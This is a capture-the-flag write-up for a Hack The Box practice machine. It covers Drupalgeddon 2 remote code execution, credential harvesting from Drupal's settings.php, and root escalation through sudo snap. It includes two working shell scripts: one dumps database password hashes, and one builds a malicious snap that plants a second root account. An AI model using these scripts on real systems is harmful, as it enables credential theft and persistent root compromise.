Armageddon
https://app.hackthebox.com/machines/323
Nmap
Port 80 hosts a web server which is visually identifiable as a Drupal instance.
Standard enumeration did not show anything of interest, so drupwn was used to identify the exact version of Drupal installed.
Github: https://github.com/immunIT/drupwn
Install
Usage
Searchsploit
Searchsploit shows that this version of Drupal is vulnerable to "Drupalgeddon", specifically Drupalgeddon 2 (CVE-2018-7600), an unauthenticated remote code execution flaw.
Metasploit has a module for it (exploit/unix/webapp/drupal_drupalgeddon2). Once the correct options were set the exploit was executed, returning a Meterpreter shell.
With a shell, we find we are running as the apache user. As Drupal is installed we perform some basic enumeration to look for MySQL credentials: Drupal keeps its database settings in sites/default/settings.php, and the command below can be used to scour that file for them.
With the above credentials we run a single query against MySQL to pull a password hash for a user on the machine.
This hash is then cracked with john to reveal the credentials brucetherealadmin:boobo.
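The credential-hunting steps above, as an added example that is not part of the original writeup: a script that parses the live `$databases` array out of a Drupal 7 settings.php (skipping the commented-out examples the stock file ships with) and dumps the `users` table with the recovered credentials. The settings.php path, database name, user and password are constructed placeholders; the sample file is embedded so the parser can be exercised offline.

```shell
#!/bin/sh
# Added example, not from the original writeup: pull the MySQL credentials
# out of a Drupal 7 settings.php and use them to dump the users table.
# The settings.php path, database name, user and password below are
# illustrative; on a real target the file lives under the web root, e.g.
# /var/www/html/sites/default/settings.php.

# Print database/username/password from the $databases array as key=value.
# Splitting on single quotes gives: $2 = key, $4 = value. Requiring $1 to be
# only whitespace skips the commented-out example arrays ( * 'database' => ...)
# that ship in the stock settings.php.
extract_db_creds() {
    awk -F"'" '$1 ~ /^[ \t]*$/ && ($2 == "database" || $2 == "username" || $2 == "password") {
        print $2 "=" $4
    }' "$1"
}

# Constructed sample of a Drupal 7 settings.php, including a commented
# example block that must be ignored.
sample_settings() {
    cat <<'EOF'
<?php
/**
 * Example (commented out, not live):
 *   'database' => 'databasename',
 *   'username' => 'username',
 */
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'ExamplePass1',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
EOF
}

# Dump Drupal account names and password hashes. Drupal 7 stores them in
# the `users` table; the `pass` column holds the $S$... hash that john
# handles with --format=Drupal7.
dump_user_hashes() {
    db="$1"; user="$2"; pass="$3"
    mysql -u "$user" -p"$pass" -e 'SELECT name, pass FROM users;' "$db"
}

# Usage on the target:  sh drupal_creds.sh run /var/www/html/sites/default/settings.php
# Then, on the attacking host:
#   john --format=Drupal7 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
if [ "${1:-}" = "run" ]; then
    db=$(extract_db_creds "$2" | sed -n 's/^database=//p')
    user=$(extract_db_creds "$2" | sed -n 's/^username=//p')
    pass=$(extract_db_creds "$2" | sed -n 's/^password=//p')
    dump_user_hashes "$db" "$user" "$pass"
fi
```

The whitespace check on the first field is the part worth keeping: a plain grep for `'password'` returns the commented documentation lines as well as the live value, and on a stock settings.php that is several false hits before the real one.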
We can now log in over SSH as the user brucetherealadmin.
From here linpeas.sh was used to look for privilege escalation paths.
It shows that the current user can run the /usr/bin/snap binary as root via sudo without a password.
GTFOBins: https://gtfobins.github.io/gtfobins/snap/
The GTFOBins entry shows that a malicious snap package can be crafted and installed so that its install hook executes in the context of the root user.
The blog post linked below shows some ways in which this can be done.
Blog: https://blog.ikuamike.io/posts/2021/package_managers_privesc/#exploitation-snap
We can also use Snap_Generator, linked below, to craft the required snap package.
Github: https://github.com/0xAsh/Snap_Generator
Install fpm (Required)
Download and prepare Snap_Generator
With Snap_Generator prepared, we pass the snap_generator.sh script the command we want the package to run. In this instance we add a new user with UID 0 (a second root) to the target system.
Upload the snap package to the target system and install it with sudo snap.
After the install completes, check /etc/passwd for the new user.
Once confirmed, switch over to the new user with su.
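The package-building procedure above, as an added example that is not part of the original writeup and is not Snap_Generator's own code: the same malicious snap built by hand with fpm, following the GTFOBins snap recipe, with an install hook that appends a UID-0 account to /etc/passwd. The package name, user name and password are placeholders, and fpm and openssl are assumed to be present on the attacking host.

```shell
#!/bin/sh
# Added example, not from the original writeup or from Snap_Generator: build a
# malicious snap by hand with fpm, following the GTFOBins snap recipe. The snap's
# install hook runs as root during `sudo snap install`, so it can append a
# UID-0 account to /etc/passwd. Package name, user name and password are
# illustrative; fpm and openssl are assumed to be on the attacking host.

# Build a passwd(5) line for a second UID-0 account. Callers pass the hash
# in (openssl passwd -6, i.e. SHA-512 crypt), so no plaintext ends up in the
# package and this function needs no external tools.
make_passwd_line() {
    user="$1"; hash="$2"
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash"
}

# Render the install hook. GTFOBins ends the hook with `false` so the
# install fails: the command has already run as root, and snapd then
# discards the broken snap instead of leaving it mounted.
make_install_hook() {
    passwd_line="$1"
    printf "#!/bin/sh\necho '%s' >> /etc/passwd; false\n" "$passwd_line"
}

# Package the hook as a snap with fpm; prints the path of the resulting .snap.
build_snap() {
    name="$1"; hook="$2"
    workdir=$(mktemp -d)
    mkdir -p "$workdir/meta/hooks"
    printf '%s' "$hook" > "$workdir/meta/hooks/install"
    chmod +x "$workdir/meta/hooks/install"
    (cd "$workdir" && fpm -n "$name" -s dir -t snap -a all meta >/dev/null)
    echo "$workdir/${name}_1.0_all.snap"
}

# Usage on the attacking host:  sh evil_snap.sh build evil dirtyharry 'Password1'
# Then copy the .snap to the target and, as the user with sudo rights on snap:
#   sudo snap install ./evil_1.0_all.snap --dangerous --devmode
#   su - dirtyharry
if [ "${1:-}" = "build" ]; then
    hash=$(openssl passwd -6 "$4")
    build_snap "$2" "$(make_install_hook "$(make_passwd_line "$3" "$hash")")"
fi
```

Because the hook deliberately fails, `snap install` reports an error on the target; that is expected, and the new /etc/passwd line is already in place by the time the error is printed.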